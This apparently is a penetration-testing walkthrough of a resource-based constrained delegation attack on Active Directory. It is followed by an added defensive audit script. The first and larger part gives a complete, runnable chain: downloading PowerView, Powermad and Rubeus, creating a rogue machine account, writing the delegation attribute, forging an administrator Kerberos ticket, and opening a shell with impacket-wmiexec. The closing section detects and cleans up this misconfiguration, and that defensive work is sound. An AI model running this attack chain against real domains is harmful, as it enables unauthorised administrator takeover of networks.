First, download the two PowerShell scripts on the local machine.
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
wget https://raw.githubusercontent.com/Kevin-Robertson/Powermad/master/Powermad.ps1
Then upload them to the target machine and import them.
# Evil-WinRM
upload PowerView.ps1
Import-Module .\PowerView.ps1
upload Powermad.ps1
Import-Module .\Powermad.ps1
Check whether ordinary users are allowed to create new computer objects in the domain (ms-DS-MachineAccountQuota must be greater than 0).
Get-DomainObject -Identity "dc=example,dc=com" -Domain example.com
# -------------------------
# Result
ms-ds-machineaccountquota: 10
Also check that the domain controller runs at least Windows Server 2012, the first version that supports resource-based constrained delegation.
Get-DomainController
# -------------------------
# Result
OSVersion: Windows Server 2022 Standard
Additionally, check that the target computer does not already have the “msds-allowedtoactonbehalfofotheridentity” attribute set.
hostname
Get-NetComputer <hostname> | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity
# ------------------
# Result
name       msds-allowedtoactonbehalfofotheridentity
----       ----------------------------------------
<HOSTNAME> {1, 0, 4, 128...}
Now create a new computer object and look up its SID.
New-MachineAccount -MachineAccount TEST01 -Password $(ConvertTo-SecureString '12345' -AsPlainText -Force)
Get-DomainComputer test01
# ----------------------
# Result (copy the objectsid)
objectsid: S-1-5-21-1677581083-3380853377-188903654-5103
Create a new raw security descriptor that grants the new machine account access, and write it to the target computer's msds-allowedtoactonbehalfofotheridentity attribute.
# Paste the objectsid copied in the previous step.
$objectsid = "S-1-5-21-1677581083-3380853377-188903654-5103"
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$objectsid)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer $(hostname) | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
Download Rubeus.exe on the local machine.
wget https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Rubeus.exe
Then upload it to the target machine and generate the RC4 hash of the machine account's password.
# Evil-WinRM
upload Rubeus.exe
.\Rubeus.exe hash /password:12345 /user:test01 /domain:example.com
# -------------------------
# Result (copy the rc4_hmac hash)
rc4_hmac: 32ED87BDB5FDC5E9CBA88547376818D4
Using the new machine account, request a Kerberos service ticket while impersonating the administrator.
.\Rubeus.exe s4u /user:test01$ /rc4:<rc4-hash> /impersonateuser:administrator /msdsspn:cifs/<hostname>.example.com /ptt
# --------------
# Result (copy the long base64 string at the end of the output)
Then write the ticket to a .kirbi file and download it.
[IO.File]::WriteAllBytes("C:\Users\<username>\Documents\ticket.kirbi", [Convert]::FromBase64String("<new-output-hash>"))
download ticket.kirbi
Download “ticket_converter.py”.
wget https://raw.githubusercontent.com/zer1t0/ticket_converter/master/ticket_converter.py
Destroy any existing tickets on the local machine, convert the .kirbi ticket to a ccache file usable on Linux, then point KRB5CCNAME at the new ticket.
kdestroy
python3 ticket_converter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=ticket.ccache
Finally, use the ticket to get a shell.
impacket-wmiexec example.com/administrator@<hostname>.example.com -no-pass -k
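The same three facts the walkthrough checks (the machine account quota, the computer accounts it lets ordinary users create, and the msds-allowedtoactonbehalfofotheridentity descriptor) are what a defender audits to find or prevent this. The script below is an added example, not part of the original walkthrough; it assumes the RSAT ActiveDirectory module on a domain-joined host with read access to the domain, and the function names are my own.

```powershell
# Added audit script (not from the original walkthrough). Assumes the RSAT
# ActiveDirectory module on a domain-joined host with read access to the domain.
Import-Module ActiveDirectory

function Test-MachineAccountQuota {
    # The walkthrough depends on ms-DS-MachineAccountQuota being non-zero (default 10).
    $dn = (Get-ADDomain).DistinguishedName
    $quota = (Get-ADObject -Identity $dn -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
    if ($quota -gt 0) {
        Write-Warning "ms-DS-MachineAccountQuota is $quota; set it to 0 with: Set-ADObject -Identity '$dn' -Replace @{'ms-DS-MachineAccountQuota'=0}"
    }
    return $quota
}

function Get-QuotaCreatedComputer {
    # A computer account created by a non-admin through the quota (like TEST01 above)
    # records its creator in mS-DS-CreatorSID; accounts joined by admins leave it empty.
    # Assumes the module returns the attribute as a byte array.
    Get-ADComputer -LDAPFilter '(mS-DS-CreatorSID=*)' -Properties mS-DS-CreatorSID, whenCreated |
        ForEach-Object {
            $sid = New-Object System.Security.Principal.SecurityIdentifier($_.'mS-DS-CreatorSID', 0)
            try { $creator = $sid.Translate([System.Security.Principal.NTAccount]).Value }
            catch { $creator = $sid.Value }   # creator account may have been deleted since
            [pscustomobject]@{ Computer = $_.Name; Creator = $creator; Created = $_.whenCreated }
        }
}

function Get-RbcdTrustee {
    # Every computer whose msDS-AllowedToActOnBehalfOfOtherIdentity is populated, with the
    # SIDs its DACL allows to delegate. The AD module returns the attribute as an
    # ActiveDirectorySecurity object; raw bytes (as PowerView returns them) are handled too.
    Get-ADComputer -LDAPFilter '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)' `
                   -Properties msDS-AllowedToActOnBehalfOfOtherIdentity |
        ForEach-Object {
            $sd = $_.'msDS-AllowedToActOnBehalfOfOtherIdentity'
            if ($sd -is [byte[]]) {
                $raw = New-Object System.Security.AccessControl.RawSecurityDescriptor($sd, 0)
                $trustees = $raw.DiscretionaryAcl | ForEach-Object { $_.SecurityIdentifier.Value }
            } else {
                $rules = $sd.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
                $trustees = $rules | ForEach-Object { $_.IdentityReference.Value }
            }
            [pscustomobject]@{ Computer = $_.Name; AllowedToActOnBehalf = ($trustees -join ', ') }
        }
}

Test-MachineAccountQuota
Get-QuotaCreatedComputer | Format-Table -AutoSize
Get-RbcdTrustee | Format-Table -AutoSize
```

Any computer listed by Get-RbcdTrustee with a trustee nobody recognises can be cleaned with Set-ADComputer -Clear msDS-AllowedToActOnBehalfOfOtherIdentity. To catch the write itself as it happens, enable Audit Directory Service Changes with a SACL on computer objects so that Event ID 5136 records modifications of this attribute, alongside Event ID 4741 for the computer account creation.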